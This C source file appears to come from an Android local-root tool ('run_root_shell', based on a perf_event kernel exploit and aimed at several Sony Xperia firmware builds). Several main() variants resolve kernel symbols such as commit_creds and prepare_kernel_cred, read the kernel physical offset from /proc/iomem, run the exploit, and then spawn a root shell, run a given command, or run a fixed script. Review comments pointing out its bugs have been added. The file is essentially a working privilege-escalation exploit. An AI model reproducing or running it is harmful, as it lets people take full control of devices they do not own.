/*
 * Derive the kernel physical offset from /proc/iomem.
 *
 * Scans /proc/iomem line by line, remembering the start address of each
 * "System RAM" entry, and stops at the first entry whose name begins with
 * "Kernel".  The last "System RAM" start seen before that point is handed
 * to set_kernel_phys_offset().
 *
 * Returns false only when /proc/iomem cannot be opened; it returns true
 * even if no "System RAM" entry was found, in which case the offset is set
 * from a NULL pointer (i.e. 0).
 *
 * NOTE(review): the loop only stops on EOF.  A line that does not match the
 * format leaves the input position unchanged and `name` stale, so fscanf
 * may return 0 repeatedly without consuming anything -- checking `ret == 3`
 * (or `ret < 3`) before using `name` would make the loop well-defined.
 * NOTE(review): "%[^\n]" has no field width, so a line longer than BUFSIZ
 * writes past `name`; a width such as "%1023[^\n]" with a matching array
 * size would bound it.
 * NOTE(review): casting a pointer to int truncates on 64-bit targets;
 * set_kernel_phys_offset() takes an unsigned long int elsewhere on this
 * page, so the cast is lossy there -- confirm the intended width.
 */
static bool detect_kernel_phys_parameters(void)
{
    FILE *fp;
    void *system_ram_address;
    char name[BUFSIZ];
    void *start_address, *end_address;
    int ret;

    system_ram_address = NULL;

    fp = fopen("/proc/iomem", "r");
    if (!fp) {
        printf("Failed to open /proc/iomem due to %s.\n", strerror(errno));
        return false;
    }

    /* Each /proc/iomem line has the form "<start>-<end> : <name>". */
    while ((ret = fscanf(fp, "%p-%p : %[^\n]", &start_address, &end_address, name)) != EOF) {
        if (!strcmp(name, "System RAM")) {
            /* Keep overwriting: the last System RAM region before "Kernel*" wins. */
            system_ram_address = start_address;
            continue;
        }
        /* Any entry named "Kernel..." (e.g. "Kernel code") ends the scan. */
        if (!strncmp(name, "Kernel", 6)) {
            break;
        }
    }

    fclose(fp);

    /* Pointer truncated to int here -- see review note above. */
    set_kernel_phys_offset((int)system_ram_address);

    return true;
}
/*
 * Program entry point: resolve the required kernel addresses, run the
 * exploit, and spawn an interactive shell if the effective uid is 0.
 *
 * The order matters: set_kernel_phys_offset() is called before the address
 * lookups, and run_exploit() only after both lookups succeed.  Every failure
 * path prints a message and exits with EXIT_FAILURE; argc/argv are unused.
 *
 * NOTE(review): 0x200000 is a hard-coded physical offset with no comment on
 * which device/firmware it belongs to; a named constant (or a per-device
 * lookup like the one in run_with_mmap) would make the assumption visible.
 */
int main(int argc, char **argv)
{
    /* Fixed physical offset assumed for the target kernel. */
    set_kernel_phys_offset(0x200000);

    /* Global function pointer filled in by the address lookup helper. */
    remap_pfn_range = get_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        exit(EXIT_FAILURE);
    }

    if (!setup_creds_functions()) {
        printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
        exit(EXIT_FAILURE);
    }

    run_exploit();

    /* Success is judged solely by the real uid afterwards. */
    if (getuid() != 0) {
        printf("Failed to obtain root privilege.\n");
        exit(EXIT_FAILURE);
    }

    system("/system/bin/sh");

    exit(EXIT_SUCCESS);
}
/*
 * Program entry point with an optional "-c <command>" argument.
 *
 * Command-line handling: every "-c" is followed by its argument; if several
 * are given the last one wins, and a trailing "-c" with nothing after it is
 * silently ignored (command stays NULL).  After the exploit sequence (same
 * steps as the other main() variants on this page), an interactive shell is
 * started when no command was given, otherwise the command is run via
 * `sh -c`.
 *
 * NOTE(review): the execl() sentinel should be `(char *)NULL`; a bare NULL
 * may expand to a plain integer 0 and is then passed with the wrong width
 * through the variadic call on some ABIs.
 * NOTE(review): execl() only returns on failure, but that case is not
 * reported -- the process then falls through to exit(EXIT_SUCCESS).
 */
int main(int argc, char **argv)
{
    char* command = NULL;
    int i;

    /* Minimal option parsing: only "-c <command>" is recognised. */
    for (i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-c")) {
            if (++i < argc) {
                command = argv[i];
            }
        }
    }

    /* Fixed physical offset assumed for the target kernel. */
    set_kernel_phys_offset(0x200000);

    remap_pfn_range = get_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        exit(EXIT_FAILURE);
    }

    if (!setup_creds_functions()) {
        printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
        exit(EXIT_FAILURE);
    }

    run_exploit();

    if (getuid() != 0) {
        printf("Failed to obtain root privilege.\n");
        exit(EXIT_FAILURE);
    }

    if (command == NULL) {
        system("/system/bin/sh");
    } else {
        /* Sentinel should be (char *)NULL -- see review note above. */
        execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL);
    }

    exit(EXIT_SUCCESS);
}
/*
 * Program entry point for the "auto-root" build: prints a banner and
 * changelog, runs the same exploit sequence as the other main() variants on
 * this page, and on success executes a fixed shell script instead of
 * dropping into an interactive shell.
 *
 * argc/argv are unused.  All failure paths exit with EXIT_FAILURE.
 *
 * NOTE(review): the script path /data/local/tmp/doomed2 is hard-coded and
 * its existence is never checked; the system() return value is also ignored,
 * so a missing or failing script still yields EXIT_SUCCESS.
 */
int main(int argc, char **argv)
{
    printf("run_root_shell v2.2\n");
    printf("Based on pref_event exploit\n\n");
    printf("Modified for auto-rooting by DooMLoRD\n");
    printf("Part of Easy Rooting Toolkit\n\n");
    printf("Changelog:\n");
    printf("v2.0: added support for Xperia S (LT26) {FW: 6.2.B.0.211} [Cust: 1257-8080]\n");
    printf("v2.1: added support for Xperia Z (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n");
    printf("v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284} [Cust: 1272-1092]\n");

    /* Fixed physical offset assumed for the target kernel. */
    set_kernel_phys_offset(0x200000);

    remap_pfn_range = get_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        exit(EXIT_FAILURE);
    }

    if (!setup_creds_functions()) {
        printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
        exit(EXIT_FAILURE);
    }

    run_exploit();

    if (getuid() != 0) {
        printf("Failed to obtain root privilege.\n");
        exit(EXIT_FAILURE);
    } else {
        printf("Launching auto-root script!\n");
        /* Return value of system() is not checked. */
        system("/system/bin/sh /data/local/tmp/doomed2");
    }

    exit(EXIT_SUCCESS);
}
/*
 * Run `callback` through the mmap-based path.
 *
 * First defers to run_exploit_mmap(); if that reports it handled the call,
 * its `result` is returned as-is.  Otherwise the required addresses are
 * resolved in order (remap_pfn_range, then ptmx_fops mmap), each with an
 * early `false` return on failure.  The physical offset comes from the
 * device symbol table when available (minus 0x00008000), and falls back to
 * detect_kernel_phys_parameters() otherwise.
 *
 * Returns the value of attempt_exploit(), or false if any prerequisite
 * could not be resolved.
 *
 * NOTE(review): `result` is only assigned inside run_exploit_mmap(); if that
 * helper can return true without writing through its out-parameter, an
 * uninitialised bool is returned here -- confirm against its definition.
 * NOTE(review): the 0x00008000 adjustment is an undocumented magic value;
 * presumably the gap between the symbol and the kernel load base -- verify.
 */
bool run_with_mmap(memory_callback_t callback)
{
    unsigned long int kernel_physical_offset;
    bool result;

    /* Fast path: another implementation may already handle this. */
    if (run_exploit_mmap(callback, &result)) {
        return result;
    }

    /* Both setup helpers populate file-scope globals checked right after. */
    setup_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        return false;
    }

    setup_ptmx_fops_mmap_address();
    if (!ptmx_fops_mmap_address) {
        printf("You need to manage to get ptmx_fops addresses.\n");
        return false;
    }

    kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
    if (kernel_physical_offset) {
        /* Magic adjustment -- see review note above. */
        set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
    } else if (!detect_kernel_phys_parameters()) {
        /* Fallback only fails when /proc/iomem cannot be opened. */
        printf("You need to manage to get kernel_physical_offset addresses.\n");
        return false;
    }

    return attempt_exploit(ptmx_fops_mmap_address,
                           (unsigned long int)&ptmx_mmap,
                           0,
                           run_callback_with_mmap,
                           callback);
}